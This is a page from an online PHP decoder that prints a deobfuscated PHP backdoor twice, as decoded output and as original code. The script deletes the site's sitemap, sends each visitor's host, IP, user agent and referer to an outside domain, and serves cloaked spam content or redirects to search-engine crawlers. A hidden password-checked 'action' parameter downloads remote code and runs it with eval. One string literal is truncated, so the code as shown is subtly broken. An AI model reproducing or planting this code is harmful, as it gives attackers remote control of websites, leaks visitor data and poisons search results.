Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php header(\'Content-Type: text/html; charset=utf-8\'); @set_time_limit(0); @error_repo..
Decoded Output download
<?php header(\'Content-Type: text/html; charset=utf-8\'); @set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(1);
@session_start();
ini_set(\'display_errors\', \'Off\');
if (isset($_SERVER[\'DOCUMENT_ROOT\'])) {
$rTOwZgpmMehTc = $_SERVER[\'DOCUMENT_ROOT\'];
}else{
$rTOwZgpmMehTc = dirname(__FILE__);
}
$neFFQHuTLOguIPhUIH = "sitemap.xml";
if(file_exists($CMRjpbhJkeGuCqrF = $rTOwZgpmMehTc."/".$neFFQHuTLOguIPhUIH)) {
@unlink($CMRjpbhJkeGuCqrF);
}
$OTYcRDcbUBhHYQP = "http";
if (awKTPcLAjUsCCFOcaNo()) {$OTYcRDcbUBhHYQP = \'https\';} else {$OTYcRDcbUBhHYQP = \'http\';}
$FlwwmDFhmbu = NqWgrmIkFfRRM();
$CkuXXBftZx = urlencode(NqWgrmIkFfRRM());
$TWsWiQDYbohMd = urlencode(@$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
$QlXfXnhEWYWXUYIfcuzi = urlencode($_SERVER[\'HTTP_HOST\']);
$TWsWiQDYbohMd = urlencode($TWsWiQDYbohMd);
$vePflTRglbe = \'\';
if (isset($_SERVER[\'HTTP_REFERER\'])) {
$vePflTRglbe = $_SERVER[\'HTTP_REFERER\'];
}
$vePflTRglbe = urlencode($vePflTRglbe);
$UTEpYgZuWhGPvYGZOqGf = strtolower($_SERVER[\'HTTP_USER_AGENT\']);
$KPuZYSzsKXh = urlencode($UTEpYgZuWhGPvYGZOqGf);
$VNYqPRmbUtoEhKY = urlencode(isset($_SERVER[\'REMOTE_ADDR\']) ? $_SERVER[\'REMOTE_ADDR\']:\'\');
$VHbAKrQjZybuE = \'h\'.\'t\'.\'t\'.\'p\'.\':/\'.\'/h4rnh2.fruvaq.top/in\'.\'d\'.\'ex\'.\'on\'.\'e.\'.\'ph\'.\'p?\'.\'m\'.\'y\'.\'_\'.\'h\'.\'o\'.\'s\'.\'t=\'.$QlXfXnhEWYWXUYIfcuzi.\'&m\'.\'y_\'.\'u\'.\'ri=\'.$CkuXXBftZx.\'&m\'.\'y\'.\'_l\'.\'a\'.\'ng=\'.$TWsWiQDYbohMd.\'&my\'.\'_or\'.\'igi\'.\'n=\'.$vePflTRglbe.\'&ht\'.\'t\'.\'p_typ\'.\'e=\'.$OTYcRDcbUBhHYQP.\'&my\'.\'_ag\'.\'e\'.\'nt=\'.$KPuZYSzsKXh.\'&m\'.\'y_i\'.\'d=\'.$VNYqPRmbUtoEhKY;
if(!empty($_REQUEST[\'action\'])){
$aTzyfSmKxRyeBQ = $_REQUEST[\'action\'];
$oaqcwrUhiIHllF = substr($aTzyfSmKxRyeBQ, -1);
$aTzyfSmKxRyeBQ = substr($aTzyfSmKxRyeBQ, 0, strlen($aTzyfSmKxRyeBQ)-1);
$XQCzfLiBnvI = array(\'93\',\'92e\',\'f9\',\'255\',\'e\',\'1cc\',\'28d\',\'06\',\'4b19\',\'7\',\'96b0e\',\'86\',\'d\');
if(md5($aTzyfSmKxRyeBQ) == implode($XQCzfLiBnvI)){
if(isset($_REQUEST[\'action\'])){$_SESSION[\'action\'] = md5($aTzyfSmKxRyeBQ);}
$str_urls = array(\'ug\',\'g\',\'c:\',\'
$dACVYqxihmPMm = jqgRmhYvGpFjus(str_rot13(implode($str_urls)).$oaqcwrUhiIHllF.\'.t\'.\'x\'.\'t\');
eval(\'?>\' . $dACVYqxihmPMm);
}
exit();
}else{
if(strpos($UTEpYgZuWhGPvYGZOqGf, "bot") !== false || strpos($UTEpYgZuWhGPvYGZOqGf, "spider") !== false || strpos($UTEpYgZuWhGPvYGZOqGf, "yahoo") !== false || strpos($UTEpYgZuWhGPvYGZOqGf, "bing") !== false || strpos($UTEpYgZuWhGPvYGZOqGf, "google") !== false){
if(ikIyherJEMggFXr($KPuZYSzsKXh)){
$cEshuzrtsphcMiuW = trim(jqgRmhYvGpFjus($VHbAKrQjZybuE));
}
}else{
$cEshuzrtsphcMiuW = trim(jqgRmhYvGpFjus($VHbAKrQjZybuE));
}
}
if (!strstr($cEshuzrtsphcMiuW, \'notdoanything\')) {
$rVQdIstJNZZaufUVbil = array();
if (strstr($cEshuzrtsphcMiuW, \'echohtmlcontent\')) {
@header("Content-type: text/html; charset=utf-8");
$cEshuzrtsphcMiuW = str_replace("echohtmlcontent", \'\', $cEshuzrtsphcMiuW);
echo $cEshuzrtsphcMiuW;
exit();
}else if(strstr($cEshuzrtsphcMiuW, \'echoxmlcontent\')){
$cEshuzrtsphcMiuW = str_replace("echoxmlcontent", \'\', $cEshuzrtsphcMiuW);
@header("Content-type: text/xml");
echo trim($cEshuzrtsphcMiuW);
exit();
}else if(strstr($cEshuzrtsphcMiuW, \'echorobotscontent\')){
@header("Content-type: text/plain; charset=utf-8");
$cEshuzrtsphcMiuW = str_replace("echorobotscontent", \'\', $cEshuzrtsphcMiuW);
$zy_list = explode(\'[zm]\', $cEshuzrtsphcMiuW);
foreach($zy_list as $k=>$v){
echo $v.PHP_EOL;
}
exit();
}else if (strstr($cEshuzrtsphcMiuW, \'echo500pagecontent\')) {
@header(\'HTTP/1.1 500 Internal Server Error\');
exit();
}else if (strstr($cEshuzrtsphcMiuW, \'echo404pagecontent\')) {
@header(\'HTTP/1.1 404 Not Found\');
exit();
}else if (strstr($cEshuzrtsphcMiuW, \'echo301pagecontent\')) {
@header(\'HTTP/1.1 301 Moved Permanently\');
$cEshuzrtsphcMiuW = str_replace("echo301pagecontent", \'\', $cEshuzrtsphcMiuW);
@header(\'Location: \' . $cEshuzrtsphcMiuW);
exit();
}
}
function ikIyherJEMggFXr($KPuZYSzsKXh){
$UTEpYgZuWhGPvYGZOqGf = strtolower($KPuZYSzsKXh);
if ($UTEpYgZuWhGPvYGZOqGf != "") {
$WBixwjtvCgqtEgaGL = array("Googlebot", "Yahoo! Slurp", "Yahoo Slurp", "bing.com", "bingbot", "Google AdSense", "google", "yahoo", "bing");
foreach ($WBixwjtvCgqtEgaGL as $OYcRNLtKzBnkvmz) {
$str_urls = strtolower($OYcRNLtKzBnkvmz);
if (strstr($UTEpYgZuWhGPvYGZOqGf, $str_urls)) {
return true;
}
}
}else{
return false;
}
}
function awKTPcLAjUsCCFOcaNo(){
if (isset($_SERVER[\'HTTPS\']) && strtolower($_SERVER[\'HTTPS\']) !== \'off\') {
return true;
} elseif (isset($_SERVER[\'HTTP_X_FORWARDED_PROTO\']) && $_SERVER[\'HTTP_X_FORWARDED_PROTO\'] === \'https\') {
return true;
} elseif (isset($_SERVER[\'HTTP_FRONT_END_HTTPS\']) && strtolower($_SERVER[\'HTTP_FRONT_END_HTTPS\']) !== \'off\') {
return true;
}
return false;
}
function NqWgrmIkFfRRM()
{
if (isset($_SERVER[\'REQUEST_URI\'])) {
$CkuXXBftZx = $_SERVER[\'REQUEST_URI\'];
} else {
if (isset($_SERVER[\'argv\'])) {
$CkuXXBftZx = $_SERVER[\'PHP_SELF\'] . \'?\' . $_SERVER[\'argv\'][0];
} else {
$CkuXXBftZx = $_SERVER[\'PHP_SELF\'] . \'?\' . $_SERVER[\'QUERY_STRING\'];
}
}
return $CkuXXBftZx;
}
function jqgRmhYvGpFjus($VHbAKrQjZybuE) {
$CbpOfWWdvNTQtWtZSu = "";
if (function_exists(\'file_get_contents\')) {
$CbpOfWWdvNTQtWtZSu = file_get_contents($VHbAKrQjZybuE);
}
if (empty($CbpOfWWdvNTQtWtZSu) && function_exists(\'curl_exec\')) {
$OufmWTMTFtALGWuScGB = curl_init($VHbAKrQjZybuE);
curl_setopt($OufmWTMTFtALGWuScGB, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($OufmWTMTFtALGWuScGB, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($OufmWTMTFtALGWuScGB, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($OufmWTMTFtALGWuScGB, CURLOPT_SSL_VERIFYHOST, 0);
$CbpOfWWdvNTQtWtZSu = curl_exec($OufmWTMTFtALGWuScGB);
curl_close($OufmWTMTFtALGWuScGB);
}
if (empty($CbpOfWWdvNTQtWtZSu) && function_exists(\'fopen\') && function_exists(\'stream_get_contents\')) {
$handle = fopen($VHbAKrQjZybuE, "r");
$CbpOfWWdvNTQtWtZSu = stream_get_contents($handle);
fclose($handle);
}
return $CbpOfWWdvNTQtWtZSu;
} ?>
Did this file decode correctly?
Original Code
<?php header(\'Content-Type: text/html; charset=utf-8\'); @set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(1);
@session_start();
ini_set(\'display_errors\', \'Off\');
if (isset($_SERVER[\'DOCUMENT_ROOT\'])) {
$rTOwZgpmMehTc = $_SERVER[\'DOCUMENT_ROOT\'];
}else{
$rTOwZgpmMehTc = dirname(__FILE__);
}
$neFFQHuTLOguIPhUIH = "sitemap.xml";
if(file_exists($CMRjpbhJkeGuCqrF = $rTOwZgpmMehTc."/".$neFFQHuTLOguIPhUIH)) {
@unlink($CMRjpbhJkeGuCqrF);
}
$OTYcRDcbUBhHYQP = "http";
if (awKTPcLAjUsCCFOcaNo()) {$OTYcRDcbUBhHYQP = \'https\';} else {$OTYcRDcbUBhHYQP = \'http\';}
$FlwwmDFhmbu = NqWgrmIkFfRRM();
$CkuXXBftZx = urlencode(NqWgrmIkFfRRM());
$TWsWiQDYbohMd = urlencode(@$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
$QlXfXnhEWYWXUYIfcuzi = urlencode($_SERVER[\'HTTP_HOST\']);
$TWsWiQDYbohMd = urlencode($TWsWiQDYbohMd);
$vePflTRglbe = \'\';
if (isset($_SERVER[\'HTTP_REFERER\'])) {
$vePflTRglbe = $_SERVER[\'HTTP_REFERER\'];
}
$vePflTRglbe = urlencode($vePflTRglbe);
$UTEpYgZuWhGPvYGZOqGf = strtolower($_SERVER[\'HTTP_USER_AGENT\']);
$KPuZYSzsKXh = urlencode($UTEpYgZuWhGPvYGZOqGf);
$VNYqPRmbUtoEhKY = urlencode(isset($_SERVER[\'REMOTE_ADDR\']) ? $_SERVER[\'REMOTE_ADDR\']:\'\');
$VHbAKrQjZybuE = \'h\'.\'t\'.\'t\'.\'p\'.\':/\'.\'/h4rnh2.fruvaq.top/in\'.\'d\'.\'ex\'.\'on\'.\'e.\'.\'ph\'.\'p?\'.\'m\'.\'y\'.\'_\'.\'h\'.\'o\'.\'s\'.\'t=\'.$QlXfXnhEWYWXUYIfcuzi.\'&m\'.\'y_\'.\'u\'.\'ri=\'.$CkuXXBftZx.\'&m\'.\'y\'.\'_l\'.\'a\'.\'ng=\'.$TWsWiQDYbohMd.\'&my\'.\'_or\'.\'igi\'.\'n=\'.$vePflTRglbe.\'&ht\'.\'t\'.\'p_typ\'.\'e=\'.$OTYcRDcbUBhHYQP.\'&my\'.\'_ag\'.\'e\'.\'nt=\'.$KPuZYSzsKXh.\'&m\'.\'y_i\'.\'d=\'.$VNYqPRmbUtoEhKY;
if(!empty($_REQUEST[\'action\'])){
$aTzyfSmKxRyeBQ = $_REQUEST[\'action\'];
$oaqcwrUhiIHllF = substr($aTzyfSmKxRyeBQ, -1);
$aTzyfSmKxRyeBQ = substr($aTzyfSmKxRyeBQ, 0, strlen($aTzyfSmKxRyeBQ)-1);
$XQCzfLiBnvI = array(\'93\',\'92e\',\'f9\',\'255\',\'e\',\'1cc\',\'28d\',\'06\',\'4b19\',\'7\',\'96b0e\',\'86\',\'d\');
if(md5($aTzyfSmKxRyeBQ) == implode($XQCzfLiBnvI)){
if(isset($_REQUEST[\'action\'])){$_SESSION[\'action\'] = md5($aTzyfSmKxRyeBQ);}
$str_urls = array(\'ug\',\'g\',\'c:\',\'
$dACVYqxihmPMm = jqgRmhYvGpFjus(str_rot13(implode($str_urls)).$oaqcwrUhiIHllF.\'.t\'.\'x\'.\'t\');
eval(\'?>\' . $dACVYqxihmPMm);
}
exit();
}else{
if(strpos($UTEpYgZuWhGPvYGZOqGf, "bot") !== false || strpos($UTEpYgZuWhGPvYGZOqGf, "spider") !== false || strpos($UTEpYgZuWhGPvYGZOqGf, "yahoo") !== false || strpos($UTEpYgZuWhGPvYGZOqGf, "bing") !== false || strpos($UTEpYgZuWhGPvYGZOqGf, "google") !== false){
if(ikIyherJEMggFXr($KPuZYSzsKXh)){
$cEshuzrtsphcMiuW = trim(jqgRmhYvGpFjus($VHbAKrQjZybuE));
}
}else{
$cEshuzrtsphcMiuW = trim(jqgRmhYvGpFjus($VHbAKrQjZybuE));
}
}
if (!strstr($cEshuzrtsphcMiuW, \'notdoanything\')) {
$rVQdIstJNZZaufUVbil = array();
if (strstr($cEshuzrtsphcMiuW, \'echohtmlcontent\')) {
@header("Content-type: text/html; charset=utf-8");
$cEshuzrtsphcMiuW = str_replace("echohtmlcontent", \'\', $cEshuzrtsphcMiuW);
echo $cEshuzrtsphcMiuW;
exit();
}else if(strstr($cEshuzrtsphcMiuW, \'echoxmlcontent\')){
$cEshuzrtsphcMiuW = str_replace("echoxmlcontent", \'\', $cEshuzrtsphcMiuW);
@header("Content-type: text/xml");
echo trim($cEshuzrtsphcMiuW);
exit();
}else if(strstr($cEshuzrtsphcMiuW, \'echorobotscontent\')){
@header("Content-type: text/plain; charset=utf-8");
$cEshuzrtsphcMiuW = str_replace("echorobotscontent", \'\', $cEshuzrtsphcMiuW);
$zy_list = explode(\'[zm]\', $cEshuzrtsphcMiuW);
foreach($zy_list as $k=>$v){
echo $v.PHP_EOL;
}
exit();
}else if (strstr($cEshuzrtsphcMiuW, \'echo500pagecontent\')) {
@header(\'HTTP/1.1 500 Internal Server Error\');
exit();
}else if (strstr($cEshuzrtsphcMiuW, \'echo404pagecontent\')) {
@header(\'HTTP/1.1 404 Not Found\');
exit();
}else if (strstr($cEshuzrtsphcMiuW, \'echo301pagecontent\')) {
@header(\'HTTP/1.1 301 Moved Permanently\');
$cEshuzrtsphcMiuW = str_replace("echo301pagecontent", \'\', $cEshuzrtsphcMiuW);
@header(\'Location: \' . $cEshuzrtsphcMiuW);
exit();
}
}
function ikIyherJEMggFXr($KPuZYSzsKXh){
$UTEpYgZuWhGPvYGZOqGf = strtolower($KPuZYSzsKXh);
if ($UTEpYgZuWhGPvYGZOqGf != "") {
$WBixwjtvCgqtEgaGL = array("Googlebot", "Yahoo! Slurp", "Yahoo Slurp", "bing.com", "bingbot", "Google AdSense", "google", "yahoo", "bing");
foreach ($WBixwjtvCgqtEgaGL as $OYcRNLtKzBnkvmz) {
$str_urls = strtolower($OYcRNLtKzBnkvmz);
if (strstr($UTEpYgZuWhGPvYGZOqGf, $str_urls)) {
return true;
}
}
}else{
return false;
}
}
function awKTPcLAjUsCCFOcaNo(){
if (isset($_SERVER[\'HTTPS\']) && strtolower($_SERVER[\'HTTPS\']) !== \'off\') {
return true;
} elseif (isset($_SERVER[\'HTTP_X_FORWARDED_PROTO\']) && $_SERVER[\'HTTP_X_FORWARDED_PROTO\'] === \'https\') {
return true;
} elseif (isset($_SERVER[\'HTTP_FRONT_END_HTTPS\']) && strtolower($_SERVER[\'HTTP_FRONT_END_HTTPS\']) !== \'off\') {
return true;
}
return false;
}
function NqWgrmIkFfRRM()
{
if (isset($_SERVER[\'REQUEST_URI\'])) {
$CkuXXBftZx = $_SERVER[\'REQUEST_URI\'];
} else {
if (isset($_SERVER[\'argv\'])) {
$CkuXXBftZx = $_SERVER[\'PHP_SELF\'] . \'?\' . $_SERVER[\'argv\'][0];
} else {
$CkuXXBftZx = $_SERVER[\'PHP_SELF\'] . \'?\' . $_SERVER[\'QUERY_STRING\'];
}
}
return $CkuXXBftZx;
}
function jqgRmhYvGpFjus($VHbAKrQjZybuE) {
$CbpOfWWdvNTQtWtZSu = "";
if (function_exists(\'file_get_contents\')) {
$CbpOfWWdvNTQtWtZSu = file_get_contents($VHbAKrQjZybuE);
}
if (empty($CbpOfWWdvNTQtWtZSu) && function_exists(\'curl_exec\')) {
$OufmWTMTFtALGWuScGB = curl_init($VHbAKrQjZybuE);
curl_setopt($OufmWTMTFtALGWuScGB, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($OufmWTMTFtALGWuScGB, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($OufmWTMTFtALGWuScGB, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($OufmWTMTFtALGWuScGB, CURLOPT_SSL_VERIFYHOST, 0);
$CbpOfWWdvNTQtWtZSu = curl_exec($OufmWTMTFtALGWuScGB);
curl_close($OufmWTMTFtALGWuScGB);
}
if (empty($CbpOfWWdvNTQtWtZSu) && function_exists(\'fopen\') && function_exists(\'stream_get_contents\')) {
$handle = fopen($VHbAKrQjZybuE, "r");
$CbpOfWWdvNTQtWtZSu = stream_get_contents($handle);
fclose($handle);
}
return $CbpOfWWdvNTQtWtZSu;
} ?>
Function Calls
None |
Stats
MD5 | c7aa42bd035459b1ebb763d7e764ddc2 |
Eval Count | 0 |
Decode Time | 65 ms |